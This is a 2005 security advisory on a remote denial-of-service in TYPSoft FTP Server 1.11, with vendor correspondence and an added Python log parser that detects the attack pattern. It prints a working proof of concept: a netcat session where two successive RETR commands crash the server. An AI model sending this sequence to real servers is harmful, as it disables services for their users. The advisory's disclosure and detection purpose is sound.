------------------------------------------------------------
- EXPL-A-2005-016 exploitlabs.com Advisory 045 -
------------------------------------------------------------
- typsoft ftpd -

AFFECTED PRODUCTS
=================
TYPSoft FTP Server v1.11 and earlier
http://www.typsoft.com/

OVERVIEW
========
TYPSoft FTP Server is a fast and easy ftp server with
support to Standard FTP Command, Clean interface, Virtual
File System architecture, ability to resume Download and
Upload, IP Restriction, Login/Quit message, logs, Multi
Language and many other things.

DETAILS
=======
1. DOS

TYPSoft FTP Server does not properly support the RETR command
when "Sub Directory Include" is checked in the user config.
This is exploitable by users authenticated to TYPSoft ftpd.

POC
===
1. by requesting 2 RETR [string] commands in succession

C:\>nc -v 192.168.0.2 21
ftpserv [192.168.0.2] 21 (ftp) open
220 TYPSoft FTP Server 1.11 ready...
USER ok
331 Password required for ok.
PASS ok
230 User ok logged in.
RETR 0
150 Opening data connection for 0.
RETR 0
150 Opening data connection for 0.

[ crash here ]

C:\>

Exception ESocketException in module ftpserv.exe at 000862A6
"no port specified"

note: string length has no effect and does not appear exploitable.

SOLUTION:
=========
vendor contact:
Oct 10, 2005 webmaster@typsoft.com

response:
---------
Well I don't see any security problem except that TFS will raise an
error because the socket was not open on the second RETR.

It's more a bug than a security problem except if you show me the
opposite.

Marc
TYPSoft

reply:
------
see attached perl POC
it demonstrates a full crash ( program exit ) from remote.

note: a remote DOS is classified as a security issue,
even if it does not lead to compromise, due to the fact that
a remote user ( not administrative ) can disable a (needed) service.

http://www.exploitlabs.com/files/advisories/typsoft-poc.zip

response:
---------
[none]

CREDITS
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs

mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-16-typsoft-ftpd.txt
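
One way to spot the command pattern from the POC transcript in FTP control-channel logs, as an added example that is not part of the original advisory. The log format ("<client> <COMMAND> [arg]"), the function name and the sample lines are assumptions made for illustration.

```python
# Added example: flags FTP sessions that repeat RETR without renegotiating a
# data port, the command pattern shown in the advisory's POC transcript.
# The log format ("<client> <COMMAND> [arg]") is an assumption, not TYPSoft's.

DATA_SETUP = {"PORT", "PASV"}   # commands that (re)establish a data channel

def find_back_to_back_retr(lines):
    """Return [(client, line_no)] for each RETR issued while the previous
    RETR in that session had no PORT/PASV after it."""
    pending = {}   # client -> True once a RETR has used up the data setup
    hits = []
    for line_no, raw in enumerate(lines, 1):
        parts = raw.split(None, 2)
        if len(parts) < 2:
            continue                      # skip blank or malformed lines
        client, cmd = parts[0], parts[1].upper()
        if cmd in DATA_SETUP:
            pending[client] = False       # fresh data channel negotiated
        elif cmd == "RETR":
            if pending.get(client):
                hits.append((client, line_no))
            pending[client] = True
        elif cmd in ("QUIT", "USER"):
            pending.pop(client, None)     # session ended or restarted
    return hits

# Constructed sample: 192.168.0.9 mirrors the POC; 192.168.0.7 is a normal client.
SAMPLE_LOG = """\
192.168.0.7 USER alice
192.168.0.7 PASV
192.168.0.7 RETR a.txt
192.168.0.7 PASV
192.168.0.7 RETR b.txt
192.168.0.9 USER ok
192.168.0.9 PASS ok
192.168.0.9 RETR 0
192.168.0.9 RETR 0
192.168.0.7 QUIT
""".splitlines()

if __name__ == "__main__":
    for client, line_no in find_back_to_back_retr(SAMPLE_LOG):
        print(f"line {line_no}: {client} sent RETR twice with no PORT/PASV between")
```

A hit followed by an ftpserv.exe exit or restart in the host's event log is the signal worth alerting on.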